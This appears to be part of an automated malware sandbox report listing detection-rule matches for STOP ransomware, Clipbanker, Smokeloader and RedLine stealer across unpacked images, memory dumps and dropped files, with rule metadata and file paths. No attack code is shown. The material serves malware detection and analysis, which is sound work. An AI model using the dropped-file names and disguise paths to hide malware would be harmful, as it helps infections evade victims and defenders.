                Source: 31.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 31.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 31.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 31.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 25.2.B46F.exe.24d15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 25.2.B46F.exe.24d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 5.2.D804.exe.26915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 5.2.D804.exe.26915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 30.2.build3.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 30.2.build3.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 18.2.D804.exe.24d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 18.2.D804.exe.24d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 40.0.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 40.0.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 27.2.A170.exe.24c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 27.2.A170.exe.24c15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 34.2.913F.exe.24115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 34.2.913F.exe.24115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 37.2.913F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 37.2.913F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 13.2.D804.exe.25315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 13.2.D804.exe.25315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 28.2.D804.exe.24615a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 28.2.D804.exe.24615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 19.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 19.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 26.2.B46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 26.2.B46F.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 28.2.D804.exe.24615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 28.2.D804.exe.24615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 16.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 16.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 19.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 19.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 6.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 6.2.D804.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 6.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 6.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 20.0.3C54.exe.4a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects downloader / injector Author: ditekSHen
                Source: 00000026.00000002.505614178.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.380036043.0000000000859000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000007.00000002.460164953.0000000000800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000000.00000002.380148014.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000026.00000002.501652652.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0000001F.00000002.486782772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000025.00000002.508274482.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000019.00000002.473949878.0000000002434000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000026.00000002.508616217.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000026.00000002.506871844.00000000007F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 0000001E.00000000.474017727.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 0000001E.00000000.474017727.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 0000001C.00000002.488812684.000000000228A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000000.00000002.380129580.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000012.00000002.451349547.00000000023B3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000004.00000002.445989950.0000000000738000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000028.00000002.618179009.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 00000028.00000002.618179009.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 0000001E.00000002.477600932.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 0000001E.00000002.477600932.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 00000007.00000002.460214856.0000000000838000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000004.00000002.445573902.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000001E.00000002.477942290.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 0000001E.00000002.477942290.0000000001001000.00000020.00000001.01000000.00000016.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 00000004.00000002.445509996.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000028.00000000.480111248.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: 00000028.00000000.480111248.00000000009B1000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: 00000004.00000002.446406704.00000000022D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000D.00000002.450548636.0000000002490000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0000001D.00000002.489556428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000022.00000002.483526399.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000001B.00000002.490286812.0000000002380000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000018.00000002.478487593.00000000008C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000000.00000002.380107918.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000005.00000002.442702951.00000000024A5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: 00000022.00000002.482578416.0000000000887000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
                Source: 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: D804.exe PID: 2560, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: D804.exe PID: 772, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: D804.exe PID: 1340, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: D804.exe PID: 6088, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: D804.exe PID: 128, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: D804.exe PID: 4528, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: B46F.exe PID: 4928, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: B46F.exe PID: 2576, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: A170.exe PID: 1868, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: Process Memory Space: D804.exe PID: 1264, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exe, type: DROPPEDMatched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
                Source: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dll, type: DROPPEDMatched rule: OlympicDestroyer Payload Author: kevoreilly
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPEDMatched rule: OlympicDestroyer Payload Author: kevoreilly
                Source: C:\Users\user\AppData\Local\Temp\9F31.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Temp\3C54.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Temp\6FA9.exe, type: DROPPEDMatched rule: Detects downloader / injector Author: ditekSHen
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 68 -ip 68
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_004118DE
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_0040A4AA
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_0040C9B3
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_00411E22
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_004132E1
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_0041139A
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_004118DE
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_0040A4AA
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_0040C9B3
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_00411E22
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_004132E1
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_0041139A
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_004118DE
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_0040A4AA
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_0041251A
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_0040C9B3
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_004132E1
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_0041139A
                Source: XandETC.exe.20.drStatic PE information: Number of sections : 11 > 10
                Source: 01860199.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 30.0.build3.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
                Source: 30.0.build3.exe.1000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
                Source: 29.2.A170.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 29.2.A170.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 29.2.A170.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 5.2.D804.exe.26915a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 5.2.D804.exe.26915a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 5.2.D804.exe.26915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 16.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 16.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 16.2.D804.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 26.2.B46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 26.2.B46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 26.2.B46F.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 34.2.913F.exe.24115a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 34.2.913F.exe.24115a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 34.2.913F.exe.24115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 29.2.A170.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 29.2.A170.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 29.2.A170.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 27.2.A170.exe.24c15a0.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 27.2.A170.exe.24c15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 27.2.A170.exe.24c15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 25.2.B46F.exe.24d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                Source: 25.2.B46F.exe.24d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: 25.2.B46F.exe.24d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 40.2.mstsca.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
